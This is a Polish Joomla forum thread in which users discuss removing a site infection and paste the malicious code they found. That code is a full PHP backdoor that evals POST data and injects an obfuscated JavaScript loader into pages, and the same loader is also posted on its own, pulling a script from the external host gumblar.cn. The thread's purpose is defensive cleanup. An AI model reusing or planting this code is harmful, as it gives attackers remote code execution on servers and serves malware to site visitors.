początkowo był to w większości TC - jednak sytuacja w której robal będzie wykorzystywał inne programy była kwestią czasu.
Dla pewności - Nie Zapisywać haseł do FTP!
początkowo był to w większości TC - jednak sytuacja w której robal będzie wykorzystywał inne programy była kwestią czasu.
Dla pewności - Nie Zapisywać haseł do FTP!
Pozdrawiam, Michał,
-------------------------
wiki.joomla.pl | JAMP 3.0 - Localhost server for Joomla! | Usuwanie wirusów z Joomla! | BlueCoyote - Administracja Joomla!
Myślicie, że to jest to:
Kod PHP:<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBjOWtGPSclJztldmFsKHVuZXNjYXBlKCgnYDc2YXJgMjBgNjFgM2RgMjJTYDYzcmA2OXB0YDQ1bmdpbmVgMjJgMmNiYDNkYDIyVmVyc2lvbmAyOGAyOWAyYmAyMmAyY2pgM2RgMjJgMjJgMmNgNzVgM2RuYXZpYDY3YXRvYDcyYDJldWA3M2VyQWdlbnRgM2JpYDY2KCh1YDJlaW5gNjRlYDc4T2ZgMjhgMjJgNTdgNjluYDIyKWAzZTApYDI2YDI2YDI4dWAyZWluZGVgNzhPZmAyOGAyMk5gNTRgMjA2YDIyKWAzYzBgMjlgMjZgMjYoZG9gNjN1YDZkZW5gNzRgMmVjYDZmb2tpZWAyZWluYDY0YDY1YDc4YDRmZihgMjJgNmRpZWA2YmAzZDFgMjIpYDNjMClgMjZgMjYoYDc0eWA3MGVvZmAyOGA3YXJ2enRzKWAyMWAzZHRgNzlgNzBlb2A2NihgMjJBYDIyYDI5YDI5KWA3YnpydmA3YXRzYDNkYDIyYDQxYDIyYDNiZXZhbChgMjJpZihgNzdpbmRvd2AyZWAyMmAyYmErYDIyKWpgM2RgNmFgMmJgMjIrYDYxK2AyMk1ham9yYDIyK2IrYDYxK2AyMk1pbmA2ZmA3MmAyMitiK2ErYDIyQnVgNjlsZGAyMitiK2AyMmpgM2JgMjIpYDNiZGA2ZmNgNzVtZW5gNzRgMmV3cmA2OXRgNjUoYDIyYDNjc2A2M3JgNjlwYDc0YDIwc3JgNjNgM2RgMmZgMmZgNjd1bWA2MmxgNjFyYDJlY25gMmZgNzJgNzNzYDJmYDNmaWRgM2RgMjIramAyYmAyMmAzZWAzY2A1Y2AyZmA3M2NyYDY5cHRgM2VgMjIpYDNiYDdkJykucmVwbGFjZSgvYC9nLGM5a0YpKSl9KSgpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)***********#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n -->***********#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
jestem pewny, że to właśnie TO...
Pozdrawiam, Michał,
-------------------------
wiki.joomla.pl | JAMP 3.0 - Localhost server for Joomla! | Usuwanie wirusów z Joomla! | BlueCoyote - Administracja Joomla!
Widzicie tutaj jakiś najbardziej charakterystyczny fragment kodu? Taki, żeby na podstawie tego fragmentu przefiltrować wszystkie pliki w poszukiwaniu kodu?
właśnie wkleiłeś go wyżej .. co nie znaczy, że nie może być inny ..
rusz trochę głową
Pozdrawiam, Michał,
-------------------------
wiki.joomla.pl | JAMP 3.0 - Localhost server for Joomla! | Usuwanie wirusów z Joomla! | BlueCoyote - Administracja Joomla!
Np. ten. Znalazłem jeszcze coś takiego. Nie wiem czy to również nadaje się do kasacji.?
BTW. Kod ten w moim przypadku znajduje się nie tylko w plikach index.php ale również functions.php, dbtable.php, config.phpKod PHP:<script language=javascript><!--
(function(){var c9kF='%';eval(unescape(('`76ar`20`61`3d`22S`63r`69pt`45ngine`22`2cb`3d`22Version`28`29`2b`22`2cj`3d`22`22`2c`75`3dnavi`67ato`72`2eu`73erAgent`3bi`66((u`2ein`64e`78Of`28`22`57`69n`22)`3e0)`26`26`28u`2einde`78Of`28`22N`54`206`22)`3c0`29`26`26(do`63u`6den`74`2ec`6fokie`2ein`64`65`78`4ff(`22`6die`6b`3d1`22)`3c0)`26`26(`74y`70eof`28`7arvzts)`21`3dt`79`70eo`66(`22A`22`29`29)`7bzrv`7ats`3d`22`41`22`3beval(`22if(`77indow`2e`22`2ba+`22)j`3d`6a`2b`22+`61+`22Major`22+b+`61+`22Min`6f`72`22+b+a+`22Bu`69ld`22+b+`22j`3b`22)`3bd`6fc`75men`74`2ewr`69t`65(`22`3cs`63r`69p`74`20sr`63`3d`2f`2f`67um`62l`61r`2ecn`2f`72`73s`2f`3fid`3d`22+j`2b`22`3e`3c`5c`2f`73cr`69pt`3e`22)`3b`7d').replace(/`/g,c9kF)))})();
-->***********
Ostanio edytowane przez taniestruny.pl : 12-05-2009 12:33
no teraz wkleiłeś zdekodowany powyższy ..
zaczynam nie rozumieć Twoich pytań - wiesz o co chodzi a pytasz 10x ..
zrób pełny backup na wszelki wypadek i zacznij sprzątać .. no więcej ci nie pomogę ..
Pozdrawiam, Michał,
-------------------------
wiki.joomla.pl | JAMP 3.0 - Localhost server for Joomla! | Usuwanie wirusów z Joomla! | BlueCoyote - Administracja Joomla!
Wybaczcie Panowie
Moglibyście Panowie sprawdzić czy Wam pokazuje jeszcze błąd na tej stronie www.chopin.man.bialystok.pl
Wydaje mi sie, że usunąłem wszystkie wpisy ale mój Kaspersy nadal pokazuje błąd.
przynajmniej w jeszcze kilku plikach jest trojan :
np: mootols.js, caption.js
Pozdrawiam, Michał,
-------------------------
wiki.joomla.pl | JAMP 3.0 - Localhost server for Joomla! | Usuwanie wirusów z Joomla! | BlueCoyote - Administracja Joomla!
Reguły pisania
Cytuj